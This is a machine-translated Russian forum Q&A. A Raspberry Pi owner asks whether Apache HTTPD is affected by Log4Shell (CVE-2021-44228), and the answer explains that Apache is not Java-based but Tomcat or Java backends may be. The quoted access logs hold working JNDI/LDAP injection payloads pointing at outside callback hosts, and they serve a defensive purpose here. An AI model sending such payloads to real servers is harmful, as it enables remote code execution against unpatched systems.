Использует ли веб-сервер Apache log4j (CVE-2021-44228)?

Использует ли веб-сервер apache (apache2) log4j?

У меня есть Apache2 2.4.38 (debian), установленный на ОС Raspberry Pi (64 бит), и я обнаружил в своем журнале некоторые странные записи, касающиеся CVE-2021-44228 от kryptoslogic-cve-2021-44228.com (приманка/сканер), datastatistics.com (автономный и вредоносный?) и a8fvkc.dnslog.cn (я не знаю что это)

Что мне теперь делать?

• ничего, потому что apache2 не подвержен CVE-2021-44228
• отформатируйте все и подождите несколько дней, прежде чем я установлю пропатченную версию
• «проверьте», есть ли какие-либо новые файлы .class и не продолжаются ли операции (и используйте ручные исправления, такие как log4j2.formatMsgNoLookups = ИСТИНА
• что-то другое

Журналы:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/дек/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/дек/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Криптос Логик Контрольная"
139.59.99.80 - - [12/дек/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/дек/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/дек/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Криптос Логик Контрольная"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.datastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}" "${jndi:ldap:/ /[****мой_домен****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.datastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}"
191.101.132.152 - - [11/дек/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.datastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.datastatistics.com/help}"
137.184.106.119 - - [10/дек/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/дек/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ а}"

Сам Apache не написан на Java и напрямую не связывает печально известную библиотеку Log4j. Он особенно защищен от этой уязвимости.

Тогда что еще может пойти не так?

1. Не все с Apache в названии и HTTP-функциями точно в HTTPD-сервер Apache.Например, Apache Tomcat — это совершенно другой HTTP-веб-сервер. Он написан на Java и может быть настроен для использования Log4J. Я не совсем уверен, возможно ли вообще войти в Tomcat иначе.

Кто-то с меньшим опытом и знаниями вполне способен ошибиться в этих двух. И, насколько мне известно, у Tomcat в целом лучший послужной список безопасности, чем у «классического» Apache HTTPD.

(Согласно комментарию Боба, средство ведения журнала по умолчанию в Tomcat не Log4J.)

2. Apache HTTPD очень расширяемый. Его можно настроить для вызова других вещей в фоновом режиме с помощью различных интерфейсов (например, для получения динамических веб-страниц, которые генерируются программно). Некоторые из этих «вещей в фоновом режиме» могут быть основаны на Java и связаны с библиотекой Log4J.

Ваш пробег может варьироваться, особенно если вы не знаете в деталях свой программный стек.

Чтобы быть уверенным, вы должны сначала проверить, установлена ​​ли у вас какая-либо машина Java. В вашем менеджере пакетов эти пакеты будут называться JRE-something, JVM-something или, может быть, JAVA-something.

Вы также можете попробовать:

Java-версия

в твоей оболочке.

Если у вас их нет и вы не устанавливали JAVA вне своего менеджера пакетов, вы в безопасности.

Небезопасно в целом, но, по крайней мере, защищено от CVE-2021-44228.